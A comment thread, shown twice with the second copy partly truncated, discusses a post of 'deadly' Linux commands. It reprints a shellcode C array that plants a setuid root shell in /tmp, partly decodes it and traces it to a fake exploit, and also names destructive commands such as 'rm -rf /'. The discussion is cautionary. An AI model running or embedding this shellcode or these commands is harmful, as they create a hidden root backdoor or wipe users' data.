The Deadly Linux Commands (opens in new tab)

(plus.google.com)

32 pointsNARKOZ14y ago11 comments

11 comments

11 comments · 6 top-level

philh14y ago· 3 in thread

    char esp[] _attribute_ ((section(".text"))) /* e.s.p release */
    = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
    "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
    "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
    "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
    "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
    "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
    "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
    "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";

Can anyone explain this one? I would have guessed that it's causing an exec (or something equivalent) with argv "/bin/sh", "-c", "cp -p /bin/sh...". That's malicious if run as root ('4' in 4755 is setuid, so it basically hides a root shell in /tmp), but it's not 'rm -rf /'. I could believe that the post is wrong, but I'd still like to know how this works.

What I've gathered:

1. The final bytes of hex there are "/bin/sh\0-c\0", which is where I'm getting the argv from. The exec is mostly a guess, because I can't think what else it would be doing. The previous hex bytes are non-text, possibly precompiled executable code.

2. The '_attribute_ ((section(".text")))' is a gcc extension that causes this string not to be stored where it usually would be in the binary. I believe the .data section would be more normal? But I've never been very clear on what the different sections are for.

hkolk14y ago

The post is wrong. This does nothing since it is a line of C code, so not actually executable.

It comes from this trick-email: http://seclists.org/fulldisclosure/2007/Aug/71

There are some details on these commands (and looks like the source article) here: http://ubuntuforums.org/announcement.php?f=48 (3rd post)

VMG14y ago

It's not even a valid C program, not to mention that it isn't a shell command

I found the earliest mention of this here, as part of a fake sudo exploit in 2005: http://seclists.org/fulldisclosure/2005/Aug/39

shoddy article.

[edit: as pointed out by hkolk, the exploit is fake and runs rm -rf]

yread14y ago

It's definitely executable code EB 3E means jump 62 bytes ahead. Which lands on E8 BD FF FF FF which is a call 67 bytes back (i.e. calls the routine immediately following the previous jump)... and at this point I got too lazy :)

simias14y ago· 1 in thread

And we could come up with a million other different ways to wreck a un*x system. The only rule is not to run a command you don't understand, especially if it comes from an untrusted source.

Also, most of those commands won't hurt much if they're not run as root (except the forkbomb and the recursive chmod/rm, and rm won't let you do that by default). If you run untrusted commands as root you deserve what happens to you.

hobin14y ago

^That.

A simple rule of thumb is: don't run any commands you don't understand before looking up a few descriptions of what it means (or use man pages).

Number 2, for example, is just a bunch of shellcode, and unless you do penetration testing for a living, you probably can't directly see what it'd do. This goes not only for this particular script, but for mostly every piece of shellcode that can be written. (And make no mistake, there are a frapillion ways in which a piece of shellcode can utterly destroy your computer.) Ergo: don't run them if you don't get them.

16s14y ago· 1 in thread

Most of those must be executed as root to cause harm.

VMG14y ago

which doesn't mean that running command as a user is less dangerous - in fact I think that rm -rf ~ is more damaging to a normal user than rm -rf /.

morsch14y ago

FWIW, and please do not rely on this or test it, but rm -rf / should not do anything on most Linux installs since --preserve-root is the default.

nzmsv14y ago

Not my proudest moment: once I set up a chroot with several directories using "mount --bind". Then I didn't need it anymore, so I promptly issued an "rm -rf *".

alpb14y ago

Pardon me but I'm impressed as a noob Linux user. 12 commands listed. 6 of them are rm -rf jokes, 6 of them are /dev/sda jokes. I'd expect different cool stuff.

j / k navigate · click thread line to collapse

11 comments

11 comments · 6 top-level

philh14y ago· 3 in thread

    char esp[] _attribute_ ((section(".text"))) /* e.s.p release */
    = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
    "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
    "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
    "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
    "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
    "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
    "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
    "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";

What I've gathered:

hkolk14y ago

The post is wrong. This does nothing since it is a line of C code, so not actually executable.

It comes from this trick-email: http://seclists.org/fulldisclosure/2007/Aug/71

There are some details on these commands (and looks like the source article) here: http://ubuntuforums.org/announcement.php?f=48 (3rd post)

VMG14y ago

It's not even a valid C program, not to mention that it isn't a shell command

I found the earliest mention of this here, as part of a fake sudo exploit in 2005: http://seclists.org/fulldisclosure/2005/Aug/39

shoddy article.

[edit: as pointed out by hkolk, the exploit is fake and runs rm -rf]

yread14y ago

simias14y ago· 1 in thread

And we could come up with a million other different ways to wreck a un*x system. The only rule is not to run a command you don't understand, especially if it comes from an untrusted source.

hobin14y ago

^That.

A simple rule of thumb is: don't run any commands you don't understand before looking up a few descriptions of what it means (or use man pages).

16s14y ago· 1 in thread

Most of those must be executed as root to cause harm.

VMG14y ago

which doesn't mean that running command as a user is less dangerous - in fact I think that rm -rf ~ is more damaging to a normal user than rm -rf /.

morsch14y ago

FWIW, and please do not rely on this or test it, but rm -rf / should not do anything on most Linux installs since --preserve-root is the default.

nzmsv14y ago

Not my proudest moment: once I set up a chroot with several directories using "mount --bind". Then I didn't need it anymore, so I promptly issued an "rm -rf *".

alpb14y ago

Pardon me but I'm impressed as a noob Linux user. 12 commands listed. 6 of them are rm -rf jokes, 6 of them are /dev/sda jokes. I'd expect different cool stuff.

j / k navigate · click thread line to collapse